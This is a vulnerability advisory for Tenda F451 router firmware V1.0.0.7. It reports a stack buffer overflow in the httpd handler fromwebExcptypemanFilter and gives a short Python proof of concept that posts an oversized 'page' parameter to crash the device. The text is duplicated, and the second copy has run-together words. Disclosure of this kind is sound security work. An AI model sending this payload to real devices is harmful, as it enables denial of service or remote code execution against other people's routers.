Information
Vendor: Tenda
Product: F451_kfw_V1.0.0.7_cn_svn7958
Version: V1.0.0.7
Vulnerability: buffer overflow
Firmware Download: https://www.tenda.com.cn/material/show/1597
Author: Xianmao Ji
Descriptions
We found an overflow vulnerability in httpd :
In fromwebExcptypemanFilter function,it reads in a user-provided parameter page
And the variable v6 is passed to the sprintf function without any length check, which may overflow the stack-based buffer s.
As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.
Proof of Concept (POC)
import requests
url = "http://127.0.0.1/goform/webExcptypemanFilter"
payload = {
'page':b'a'*2048
}
res = requests.post(url=url,data=payload)
Overcome
Information
Vendor: Tenda
Product: F451_kfw_V1.0.0.7_cn_svn7958
Version: V1.0.0.7
Vulnerability: buffer overflow
Firmware Download: https://www.tenda.com.cn/material/show/1597
Author: Xianmao Ji
Descriptions
We found an overflow vulnerability in httpd :
In fromwebExcptypemanFilter function,it reads in a user-provided parameter page
And the variable
v6is passed to the sprintf function without any length check, which may overflow the stack-based buffers.As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.
Proof of Concept (POC)
import requests
url = "http://127.0.0.1/goform/webExcptypemanFilter"
payload = {
'page':b'a'*2048
}
res = requests.post(url=url,data=payload)
Overcome